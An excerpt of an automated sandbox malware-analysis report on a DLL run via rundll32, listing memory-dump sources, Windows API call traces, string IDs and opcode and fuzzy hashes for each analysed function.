                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                      • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                      • API String ID: 1036688887-2843748187
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10017185
                                                                                                                      • GetSystemMetrics.USER32 ref: 10017236
                                                                                                                      • GlobalLock.KERNEL32 ref: 1001729F
                                                                                                                      • CreateDialogIndirectParamA.USER32(?,?,?,10016BDA,00000000), ref: 100172CE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                      • String ID: MS Shell Dlg
                                                                                                                      • API String ID: 1736106359-76309092
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 10021EFD
                                                                                                                      • GetStockObject.GDI32(0000000D), ref: 10021F05
                                                                                                                      • GetObjectA.GDI32(00000000,0000003C,?), ref: 10021F12
                                                                                                                      • GetDC.USER32(00000000), ref: 10021F21
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10021F35
                                                                                                                      • MulDiv.KERNEL32 ref: 10021F41
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 10021F4D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                      • String ID: System
                                                                                                                      • API String ID: 46613423-3470857405
                                                                                                                      • Opcode ID: 61213e6980dcb3cb65d4e1bccbb3a8eece8a9d69db6aa345a8d68dd3f9e52f8f
                                                                                                                      • Instruction ID: 42bba0fd7f26ad83684da700c29fa1b9b4104b8155991441c2ce65153df76cb7
                                                                                                                      • Opcode Fuzzy Hash: 61213e6980dcb3cb65d4e1bccbb3a8eece8a9d69db6aa345a8d68dd3f9e52f8f
                                                                                                                      • Instruction Fuzzy Hash: A5119175640268EBEB10DBA0DE85FEF77B8EF1A781F800025FA05E6181EB709D05CB65
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 100209F4
                                                                                                                      • EnterCriticalSection.KERNEL32(?,00000010,10020CA6,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020A05
                                                                                                                      • TlsGetValue.KERNEL32 ref: 10020A23
                                                                                                                      • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020A57
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                      • _memset.LIBCMT ref: 10020AE2
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1891723912-0
                                                                                                                      • Opcode ID: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                      • Instruction ID: bbf58174ed8a80918add6c1c4d28f9e8b2dc0fc786f447701b2046db94720ece
                                                                                                                      • Opcode Fuzzy Hash: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                      • Instruction Fuzzy Hash: F2319874500716EFD720DF10EC85D5EBBA2EF04310BA1C529F91A9A662DB30B990CB81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10025BAC
                                                                                                                        • Part of subcall function 1002426A: SysStringLen.OLEAUT32(?), ref: 10024272
                                                                                                                        • Part of subcall function 1002426A: CoGetClassObject.OLE32(?,?,00000000,1004B62C,?), ref: 10024290
                                                                                                                      • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 10025D36
                                                                                                                      • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 10025D57
                                                                                                                      • GlobalAlloc.KERNEL32(00000000,00000000), ref: 10025DA4
                                                                                                                      • GlobalLock.KERNEL32 ref: 10025DB2
                                                                                                                      • GlobalUnlock.KERNEL32(?), ref: 10025DCA
                                                                                                                      • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10025DED
                                                                                                                      • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10025E09
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 317715441-0
                                                                                                                      • Opcode ID: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                      • Instruction ID: 6b32e8b7721f49624c611e5d3fbfac2c00c012c139a68ad78311da97252ee3f4
                                                                                                                      • Opcode Fuzzy Hash: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                      • Instruction Fuzzy Hash: BCC12BB090024AEFCF14DFA4DC889AEB7B9FF48341BA14929F916DB251D7719A40CB64
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GlobalLock.KERNEL32 ref: 10014A3F
                                                                                                                      • lstrcmpA.KERNEL32(?,?), ref: 10014A4B
                                                                                                                      • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10014A5D
                                                                                                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A7D
                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A85
                                                                                                                      • GlobalLock.KERNEL32 ref: 10014A8F
                                                                                                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10014A9C
                                                                                                                      • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10014AB4
                                                                                                                        • Part of subcall function 10020495: GlobalFlags.KERNEL32(?), ref: 100204A0
                                                                                                                        • Part of subcall function 10020495: GlobalUnlock.KERNEL32(?,?,?,10014801,?,00000004,1000116F,?,?,1000113F), ref: 100204B2
                                                                                                                        • Part of subcall function 10020495: GlobalFree.KERNEL32(?), ref: 100204BD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 168474834-0
                                                                                                                      • Opcode ID: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                      • Instruction ID: 20fc1444fe35ab48259a21c9388e4acfe4ba196ce7874d1294122afbb026df8a
                                                                                                                      • Opcode Fuzzy Hash: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                      • Instruction Fuzzy Hash: 5111CAB6500604BBDB22DFA6CD89C6FBBEDEF897407514029FA01C6121DA31E940D728
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F3B
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F42
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F49
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F53
                                                                                                                      • GetDC.USER32(00000000), ref: 10020F5D
                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 10020F6E
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10020F76
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 10020F7E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1151147025-0
                                                                                                                      • Opcode ID: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                      • Instruction ID: 9c0db37145597a9d8002a30536ddf2583a3ab63f37cab70819204e46a6a6359b
                                                                                                                      • Opcode Fuzzy Hash: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                      • Instruction Fuzzy Hash: 84F09670A40714AEF7206F718D8DF277BA4EBC6B51F01442AE611CB2D0D6B598018F50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10018224
                                                                                                                      • MapDialogRect.USER32(?,00000000), ref: 100182B5
                                                                                                                      • SysAllocStringLen.OLEAUT32(?,?), ref: 100182D4
                                                                                                                      • CLSIDFromString.OLE32(?,?), ref: 100183C6
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • CLSIDFromProgID.OLE32(?,?), ref: 100183CE
                                                                                                                      • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 10018468
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 100184BA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2841959276-0
                                                                                                                      • Opcode ID: 5a69a964b2229b4de645fa0737a3e44a531c48ca18053bc0dcb6ac84ec84f31a
                                                                                                                      • Instruction ID: 14de686d86220a01eaba4d8e7e4af7f56c4348460245bd7539e940c5f7eef93d
                                                                                                                      • Opcode Fuzzy Hash: 5a69a964b2229b4de645fa0737a3e44a531c48ca18053bc0dcb6ac84ec84f31a
                                                                                                                      • Instruction Fuzzy Hash: 99B1F075900219AFDB44CFA8C984AEE7BF4FF08344F41812AFC199B251E774EA94CB94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10029D39
                                                                                                                      • _memset.LIBCMT ref: 10029DA5
                                                                                                                        • Part of subcall function 1002BDD9: _memset.LIBCMT ref: 1002BDE1
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029DE5
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E66
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E75
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E84
                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 10029E99
                                                                                                                        • Part of subcall function 1002981B: __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                        • Part of subcall function 1002981B: VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                        • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2905758408-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3574576181-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001658F
                                                                                                                      • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1001664B
                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10016662
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 1001667C
                                                                                                                      • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1001668E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                                      • String ID: Software\
                                                                                                                      • API String ID: 3878845136-964853688
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(?), ref: 1001AC38
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AC5F
                                                                                                                      • UpdateWindow.USER32 ref: 1001AC79
                                                                                                                      • SendMessageA.USER32 ref: 1001AC9D
                                                                                                                      • SendMessageA.USER32 ref: 1001ACB7
                                                                                                                      • UpdateWindow.USER32 ref: 1001ACFD
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AD31
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2853195852-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3219385341-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A21B
                                                                                                                      • GetParent.USER32(?), ref: 1002A22C
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A24F
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A261
                                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 1002A270
                                                                                                                      • IsWindowVisible.USER32(?), ref: 1002A28A
                                                                                                                      • GetTopWindow.USER32(?), ref: 1002A2B0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$LongParentVisible
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 506644340-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 10032AB8
                                                                                                                      • __calloc_crt.LIBCMT ref: 10032AC4
                                                                                                                      • CreateThread.KERNEL32(00000002,?,V&',00000000,?,1001623D), ref: 10032B08
                                                                                                                      • GetLastError.KERNEL32(?,1001623D,?,?,100160A8,?,00000002,00000030,?,00000000), ref: 10032B12
                                                                                                                      • __dosmaperr.LIBCMT ref: 10032B2A
                                                                                                                        • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                        • Part of subcall function 10037753: __decode_pointer.LIBCMT ref: 1003775C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit
                                                                                                                      • String ID: V&'
                                                                                                                      • API String ID: 1067611704-802299783
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10016C9F: _memset.LIBCMT ref: 10016CB6
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013DA
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013EC
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013FE
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001410
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001422
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001446
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001458
                                                                                                                        • Part of subcall function 100136C0: LoadIconA.USER32 ref: 100136D2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
